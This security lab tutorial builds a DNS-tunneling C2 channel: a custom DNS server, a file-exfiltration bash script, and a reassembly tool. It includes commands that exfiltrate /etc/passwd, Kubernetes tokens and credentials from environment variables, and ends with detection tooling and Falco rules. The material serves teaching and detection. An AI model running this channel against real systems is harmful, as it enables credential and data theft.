DNS is the one protocol that almost every firewall allows outbound. Attackers exploit this by encoding stolen data inside DNS queries, where the subdomain labels carry base64-encoded chunks and a custom authoritative DNS server on the other end reassembles them. This technique is used by real-world malware families including SUNBURST, OilRig, and Cobalt Strike's DNS beacon.
This lab builds a complete DNS C2 channel from scratch: a custom DNS server, client exfiltration scripts, server-side reassembly, and detection tools. Everything runs locally with Docker.
Traditional exfiltration uses HTTPS, but DNS tunneling abuses the DNS protocol itself:
TXT Record Bootstrap, the client queries a TXT record to establish a session. The C2 server responds with a unique session ID embedded in the TXT response.
Subdomain Encoding, the client splits data into small chunks, base64-encodes each one, and sends them as subdomain labels in A/CNAME queries: <session>.<seq>.<chunk>.textsip.com
CNAME Flow Control, the server responds with CNAME records pointing to next-<session>.textsip.com, acting as an acknowledgment mechanism.
Server-Side Reassembly, the server logs every chunk with its sequence number. A reassembly tool sorts chunks by sequence, concatenates, and decodes to recover the original file.

dig command-line tool (part of bind-utils or dnsutils)dns-c2-lab/
├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── dns_server.py # C2 DNS server
├── reassemble_dns.py # Payload reassembly tool
├── analyze_dns_logs.py # Detection/analysis tool
└── logs/ # Created at runtime
FROM python:3.12-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY dns_server.py .
EXPOSE 53/udp
EXPOSE 53/tcp
CMD ["python", "dns_server.py"]
services:
textsip-dns:
build: .
container_name: textsip-dns
ports:
- "5353:53/udp"
- "5353:53/tcp"
volumes:
- ./logs:/app/logs
restart: unless-stopped
Port 5353 is used to avoid conflicting with your host's DNS resolver on port 53.
dnslib
docker compose up -d --build
docker logs -f textsip-dns
You should see:
[+] TextSip DNS lab listening on UDP/TCP 53
[+] Logs: /app/logs
[+] All queries: /app/logs/all_queries.log
The server handles four types of queries:
When a client queries textsip.com with type TXT, the server issues a new session:
if qtype == "TXT" and qname == DOMAIN:
session_id = short_uuid() # e.g., "2d965f52"
issued_subdomain = f"{session_id}.textsip.com."
next_subdomain = f"next-{session_id}.textsip.com."
txt_value = f"ip4:{issued_subdomain.rstrip('.')}"
reply.add_answer(RR(
rname=request.q.qname,
rtype=QTYPE.TXT,
rclass=1,
ttl=15,
rdata=TXT(txt_value),
))
The ip4: prefix makes the TXT response look like an SPF record to casual observers.
Chunks arrive as subdomain labels in the format <session>.<seq>.<chunk>.textsip.com:
if len(labels) >= 3 and qtype in ("A", "CNAME", "TXT"):
session_id = labels[0] # "2d965f52"
seq = labels[1] # "0001"
chunk = ".".join(labels[2:]) # base64url-encoded data
session["chunks"][seq] = chunk
reply.add_answer(RR(
rname=request.q.qname,
rtype=QTYPE.CNAME,
rclass=1,
ttl=15,
rdata=CNAME(next_subdomain),
))
Every chunk is analyzed for Shannon entropy and encoding patterns, this is used both for server-side logging and as a detection signal:
def shannon_entropy(value):
if not value:
return 0.0
counts = {}
for c in value:
counts[c] = counts.get(c, 0) + 1
entropy = 0.0
for count in counts.values():
p = count / len(value)
entropy -= p * math.log2(p)
return round(entropy, 3)
def looks_encoded(value):
raw = value.replace(".", "").replace("=", "")
if len(raw) < 8:
return False
b32 = set("abcdefghijklmnopqrstuvwxyz234567")
b64url = set("abcdefghijklmnopqrstuvwxyz"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_")
if all(c in b32 for c in raw.lower()):
return True
if all(c in b64url for c in raw):
return True
return False
#!/usr/bin/env python3
import os
import uuid
import json
import math
import threading
from datetime import datetime, timezone
from dnslib import RR, QTYPE, TXT, CNAME, SOA, NS, A
from dnslib.server import DNSServer, BaseResolver
DOMAIN = "textsip.com."
NS_HOST = "ns1.textsip.com."
LOG_DIR = "/app/logs"
os.makedirs(LOG_DIR, exist_ok=True)
lock = threading.Lock()
issued_sessions = {}
def now_utc():
return datetime.now(timezone.utc).isoformat()
def short_uuid():
return uuid.uuid4().hex[:8]
def normalize_qname(qname):
return str(qname).lower().rstrip(".") + "."
def strip_domain(qname):
qname = normalize_qname(qname)
if qname.endswith(DOMAIN):
return qname[: -len(DOMAIN)].strip(".")
return qname.strip(".")
def safe_name(value):
return value.replace("/", "_").replace("\\", "_").replace("..", "_")
def write_json_log(path, event):
with open(path, "a") as f:
f.write(json.dumps(event, sort_keys=True) + "\n")
def log_all(event):
write_json_log(os.path.join(LOG_DIR, "all_queries.log"), event)
def log_session(session_id, event):
path = os.path.join(LOG_DIR, f"{safe_name(session_id)}.textsip.com.log")
write_json_log(path, event)
def get_client(handler):
try:
return handler.client_address
except Exception:
return "unknown", "unknown"
def shannon_entropy(value):
if not value:
return 0.0
counts = {}
for c in value:
counts[c] = counts.get(c, 0) + 1
entropy = 0.0
for count in counts.values():
p = count / len(value)
entropy -= p * math.log2(p)
return round(entropy, 3)
def looks_encoded(value):
raw = value.replace(".", "").replace("=", "")
if len(raw) < 8:
return False
b32 = set("abcdefghijklmnopqrstuvwxyz234567")
b64url = set(
"abcdefghijklmnopqrstuvwxyz"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_"
)
if all(c in b32 for c in raw.lower()):
return True
if all(c in b64url for c in raw):
return True
return False
def base_event(event_type, request, handler, extra=None):
qname = normalize_qname(request.q.qname)
qtype = QTYPE[request.q.qtype]
client_ip, client_port = get_client(handler)
stripped = strip_domain(qname)
labels = [] if stripped == "" else stripped.split(".")
event = {
"time": now_utc(),
"event_type": event_type,
"client_ip": client_ip,
"client_port": client_port,
"qname": qname,
"qtype": qtype,
"labels": labels,
"label_count": len(labels),
"qname_length": len(qname),
"max_label_length": max([len(x) for x in labels], default=0),
}
if extra:
event.update(extra)
return event
class TextSipResolver(BaseResolver):
def resolve(self, request, handler):
reply = request.reply()
qname = normalize_qname(request.q.qname)
qtype = QTYPE[request.q.qtype]
labels = strip_domain(qname).split(".") if qname.endswith(DOMAIN) else []
query_event = base_event("query_seen", request, handler)
log_all(query_event)
# TXT bootstrap
if qtype == "TXT" and qname == DOMAIN:
with lock:
session_id = short_uuid()
issued_subdomain = f"{session_id}.textsip.com."
next_subdomain = f"next-{session_id}.textsip.com."
issued_sessions[session_id] = {
"session_id": session_id,
"issued_subdomain": issued_subdomain,
"next_subdomain": next_subdomain,
"created_at": now_utc(),
"txt_queries": 1,
"subdomain_queries": 0,
"chunk_queries": 0,
"chunks": {},
}
txt_value = f"ip4:{issued_subdomain.rstrip('.')}"
reply.add_answer(
RR(
rname=request.q.qname,
rtype=QTYPE.TXT,
rclass=1,
ttl=15,
rdata=TXT(txt_value),
)
)
log_session(session_id, base_event(
"txt_issued_session", request, handler,
{"session_id": session_id, "txt_response": txt_value}
))
return reply
if qname.endswith(DOMAIN):
# Chunk: <session>.<seq>.<chunk>.textsip.com
if len(labels) >= 3 and qtype in ("A", "CNAME", "TXT"):
session_id = labels[0]
seq = labels[1]
chunk = ".".join(labels[2:])
with lock:
session = issued_sessions.get(session_id)
if session:
session["chunk_queries"] += 1
session["chunks"][seq] = chunk
next_subdomain = session["next_subdomain"]
else:
next_subdomain = f"unknown-session.{DOMAIN}"
log_session(session_id, base_event(
"chunk_received", request, handler,
{"session_id": session_id, "seq": seq, "chunk": chunk,
"chunk_entropy": shannon_entropy(chunk),
"encoded_like": looks_encoded(chunk)}
))
reply.add_answer(
RR(
rname=request.q.qname,
rtype=QTYPE.CNAME,
rclass=1,
ttl=15,
rdata=CNAME(next_subdomain),
)
)
return reply
# Session query: <session>.textsip.com
if len(labels) == 1 and qtype in ("A", "CNAME"):
session_id = labels[0]
with lock:
session = issued_sessions.get(session_id)
if session:
reply.add_answer(
RR(
rname=request.q.qname,
rtype=QTYPE.CNAME,
rclass=1,
ttl=15,
rdata=CNAME(session["next_subdomain"]),
)
)
return reply
# Next query: next-<session>.textsip.com
if len(labels) == 1 and labels[0].startswith("next-"):
session_id = labels[0].replace("next-", "", 1)
with lock:
session = issued_sessions.get(session_id)
if session:
done_sub = f"done-{session_id}.textsip.com."
reply.add_answer(
RR(
rname=request.q.qname,
rtype=QTYPE.CNAME,
rclass=1,
ttl=15,
rdata=CNAME(done_sub),
)
)
return reply
# NS / SOA / A fallback
if qtype == "NS" and qname == DOMAIN:
reply.add_answer(RR(rname=DOMAIN, rtype=QTYPE.NS, rclass=1,
ttl=60, rdata=NS(NS_HOST)))
elif qtype == "SOA" and qname == DOMAIN:
reply.add_answer(RR(rname=DOMAIN, rtype=QTYPE.SOA, rclass=1,
ttl=60, rdata=SOA(mname=NS_HOST,
rname="admin.textsip.com.",
times=(2026060101, 3600, 600, 86400, 60))))
elif qtype == "A" and qname == NS_HOST:
reply.add_answer(RR(rname=request.q.qname, rtype=QTYPE.A,
rclass=1, ttl=60, rdata=A("127.0.0.1")))
return reply
if __name__ == "__main__":
resolver = TextSipResolver()
udp = DNSServer(resolver, port=53, address="0.0.0.0", tcp=False)
tcp = DNSServer(resolver, port=53, address="0.0.0.0", tcp=True)
udp.start_thread()
tcp.start_thread()
print("[+] TextSip DNS lab listening on UDP/TCP 53")
print("[+] Logs: /app/logs")
try:
while True:
threading.Event().wait(1)
except KeyboardInterrupt:
print("[-] shutting down")
First, bootstrap a session:
# Get a session ID from the TXT record
SESSION=$(dig @127.0.0.1 -p 5353 -t txt textsip.com +short \
| tr -d '"' | cut -d: -f2 | cut -d. -f1)
echo "Session: $SESSION"
Send a single chunk:
# Send chunk with sequence 0001
dig @127.0.0.1 -p 5353 ${SESSION}.0001.SGVsbG8gV29ybGQ.textsip.com +short
Check the server logs:
cat logs/${SESSION}.textsip.com.log | python3 -m json.tool
This script exfiltrates any file over DNS:
#!/usr/bin/env bash
set -euo pipefail
# Configuration
DNS_SERVER="127.0.0.1"
DNS_PORT="5353"
DOMAIN="textsip.com"
CHUNK_SIZE=50
FILE="$1"
if [[ -z "${FILE:-}" ]]; then
echo "Usage: $0 <file-to-exfiltrate>"
exit 1
fi
if [[ ! -f "$FILE" ]]; then
echo "[-] File not found: $FILE"
exit 1
fi
echo "[*] Target file: $FILE ($(wc -c < "$FILE") bytes)"
# Step 1: Bootstrap session via TXT query
echo "[*] Bootstrapping session..."
SESSION=$(dig @${DNS_SERVER} -p ${DNS_PORT} -t txt ${DOMAIN} +short \
| tr -d '"' | cut -d: -f2 | cut -d. -f1)
if [[ -z "$SESSION" ]]; then
echo "[-] Failed to get session ID"
exit 1
fi
echo "[+] Session: $SESSION"
# Step 2: Encode file as base64url (no padding, URL-safe)
ENCODED=$(base64 < "$FILE" | tr '+/' '-_' | tr -d '=\n')
TOTAL=${#ENCODED}
CHUNKS=$(( (TOTAL + CHUNK_SIZE - 1) / CHUNK_SIZE ))
echo "[*] Encoded size: $TOTAL bytes"
echo "[*] Chunks: $CHUNKS (${CHUNK_SIZE} bytes each)"
# Step 3: Send chunks
SEQ=0
OFFSET=0
while [[ $OFFSET -lt $TOTAL ]]; do
CHUNK="${ENCODED:$OFFSET:$CHUNK_SIZE}"
SEQ_PAD=$(printf "%04d" $SEQ)
QNAME="${SESSION}.${SEQ_PAD}.${CHUNK}.${DOMAIN}"
dig @${DNS_SERVER} -p ${DNS_PORT} "${QNAME}" +short +timeout=2 +tries=1 > /dev/null 2>&1
echo "[>] seq=${SEQ_PAD} chunk_len=${#CHUNK}"
SEQ=$((SEQ + 1))
OFFSET=$((OFFSET + CHUNK_SIZE))
# Small delay to avoid flooding
sleep 0.05
done
echo "[+] Done. Sent $SEQ chunks for session $SESSION"
echo "[+] Server log: logs/${SESSION}.textsip.com.log"
Save as exfiltrate.sh and run:
chmod +x exfiltrate.sh
# Exfiltrate /etc/passwd as a test
./exfiltrate.sh /etc/passwd
In a compromised pod, an attacker could exfiltrate service account tokens:
# Inside a compromised K8s pod
./exfiltrate.sh /var/run/secrets/kubernetes.io/serviceaccount/token
Or dump environment variables containing cloud credentials:
env | grep -iE '(aws|azure|gcp|token|secret|key|password)' > /tmp/env_dump.txt
./exfiltrate.sh /tmp/env_dump.txt
rm /tmp/env_dump.txt
After exfiltration, reassemble the chunks on the C2 server:
#!/usr/bin/env python3
import argparse
import base64
import json
import sys
from pathlib import Path
def load_chunks(path):
chunks = []
with open(path, "r") as f:
for line in f:
line = line.strip()
if not line:
continue
try:
obj = json.loads(line)
except Exception:
continue
if obj.get("event_type") != "chunk_received":
continue
seq = obj.get("seq")
chunk = obj.get("chunk")
if seq is None or chunk is None:
continue
try:
seq_num = int(seq)
except Exception:
continue
chunks.append((seq_num, chunk, obj))
chunks.sort(key=lambda x: x[0])
return chunks
def decode_payload(payload, encoding):
if encoding == "none":
return payload.encode()
if encoding == "base64":
return base64.b64decode(payload)
if encoding == "base64url":
padded = payload + "=" * (-len(payload) % 4)
return base64.urlsafe_b64decode(padded)
if encoding == "base32":
padded = payload + "=" * (-len(payload) % 8)
return base64.b32decode(padded.upper())
raise ValueError(f"unsupported encoding: {encoding}")
def main():
parser = argparse.ArgumentParser(
description="Reassemble exfiltrated data from DNS session logs."
)
parser.add_argument("logfile", help="Path to session log file")
parser.add_argument("-e", "--encoding", default="base64url",
choices=["base64", "base64url", "base32", "none"])
parser.add_argument("-o", "--output", default="recovered.bin")
args = parser.parse_args()
logfile = Path(args.logfile)
if not logfile.exists():
print(f"[-] Log file not found: {logfile}")
sys.exit(1)
chunks = load_chunks(logfile)
if not chunks:
print("[-] No chunk_received events found")
sys.exit(1)
seqs = [seq for seq, _, _ in chunks]
missing = [i for i in range(min(seqs), max(seqs) + 1) if i not in seqs]
payload = "".join(chunk for _, chunk, _ in chunks)
print(f"[+] Chunks: {len(chunks)}")
print(f"[+] Seq range: {min(seqs)} - {max(seqs)}")
print(f"[+] Missing: {len(missing)}")
print(f"[+] Encoded size: {len(payload)}")
if missing:
print(f"[!] Missing sequences: {missing[:20]}")
try:
decoded = decode_payload(payload, args.encoding)
except Exception as e:
print(f"[-] Decode failed: {e}")
sys.exit(1)
Path(args.output).write_bytes(decoded)
print(f"[+] Wrote {len(decoded)} bytes to {args.output}")
if __name__ == "__main__":
main()
Run it:
# Find the session log
ls logs/*.textsip.com.log
# Reassemble
python3 reassemble_dns.py logs/<session>.textsip.com.log \
-e base64url \
-o recovered_file.txt
# Verify
diff /etc/passwd recovered_file.txt
This tool scans DNS logs for tunneling indicators:
#!/usr/bin/env python3
import argparse
import json
from collections import Counter
from pathlib import Path
def read_events(path):
events = []
with open(path, "r") as f:
for line in f:
try:
events.append(json.loads(line))
except Exception:
pass
return events
def analyze_file(path):
events = read_events(path)
event_types = Counter(e.get("event_type", "unknown") for e in events)
chunk_events = [e for e in events if e.get("event_type") == "chunk_received"]
suspicious = []
for e in chunk_events:
reasons = []
if e.get("chunk_length", 0) >= 40:
reasons.append("long_chunk")
if e.get("chunk_entropy", 0) >= 4.0:
reasons.append("high_entropy")
if e.get("encoded_like"):
reasons.append("encoded_like")
if e.get("label_count", 0) >= 4:
reasons.append("many_labels")
if reasons:
suspicious.append({
"time": e.get("time"),
"client_ip": e.get("client_ip"),
"seq": e.get("seq"),
"chunk_length": e.get("chunk_length"),
"entropy": e.get("chunk_entropy"),
"reasons": reasons,
})
return {
"total_events": len(events),
"event_types": dict(event_types),
"chunk_events": len(chunk_events),
"suspicious": suspicious,
}
def main():
parser = argparse.ArgumentParser(
description="Analyze DNS logs for tunneling indicators."
)
parser.add_argument("path", help="Log file or directory")
args = parser.parse_args()
target = Path(args.path)
files = sorted(target.glob("*.log")) if target.is_dir() else [target]
for file in files:
result = analyze_file(file)
print(f"\n{'=' * 60}")
print(f"File: {file}")
print(f"Total events: {result['total_events']}")
print(f"Chunk events: {result['chunk_events']}")
print(f"Suspicious: {len(result['suspicious'])}")
for item in result["suspicious"][:10]:
print(f" seq={item['seq']} len={item['chunk_length']} "
f"entropy={item['entropy']} "
f"reasons={','.join(item['reasons'])}")
if __name__ == "__main__":
main()
Run against the logs directory:
python3 analyze_dns_logs.py logs/
| Signal | Threshold | Why |
|---|---|---|
| Shannon entropy per label | >= 4.0 bits | Normal subdomains have low entropy; base64 data is ~5.5 |
| Label length | >= 40 chars | Normal subdomains are short; tunnel chunks approach 63 char limit |
| Encoded-like characters | base32/base64url charset | Normal domains use readable words, not random alphanum |
| Query volume to single domain | > 50 queries/minute | Tunneling generates many sequential queries |
| Unusual TXT query volume | Baseline deviation | Bootstrap queries are uncommon for most domains |
| Sequential subdomain patterns | <hex>.<digits>.<random> |
The session.seq.chunk pattern is distinctive |
Understanding the protocol limits helps calibrate detection thresholds:
| Constraint | Limit | Impact |
|---|---|---|
| Single DNS label | 63 characters | Max chunk size per label |
| Full hostname | 253 characters | Total query length including domain |
| Practical payload per query | 30-50 bytes raw | After encoding overhead and metadata labels |
| Throughput | ~100-200 bytes/sec | Many small queries, not bulk transfer |
- rule: DNS Tunneling via dig
desc: Detects rapid dig queries with high-entropy subdomains
condition: >
spawned_process and
proc.name = "dig" and
proc.args contains "textsip" or
(proc.name = "dig" and proc.pcmdline contains "while")
output: >
Potential DNS tunneling via dig
(user=%user.name command=%proc.cmdline parent=%proc.pname)
priority: WARNING
- rule: Suspicious DNS Exfiltration Script
desc: Detects scripts reading files and piping to base64 with dig
condition: >
spawned_process and
proc.name = "base64" and
proc.pname in ("bash", "sh", "zsh") and
proc.aname[2] in ("bash", "sh", "zsh")
output: >
File encoding detected, possible DNS exfiltration staging
(user=%user.name command=%proc.cmdline)
priority: HIGH
# Count unique subdomains per domain (high count = tunneling)
tcpdump -n -i any port 53 2>/dev/null \
| grep -oP '[\w.-]+\.textsip\.com' \
| sort -u \
| wc -l
# Log all DNS queries with tshark
tshark -i any -f "port 53" -T fields \
-e frame.time -e ip.src -e dns.qry.name -e dns.qry.type \
> dns_capture.log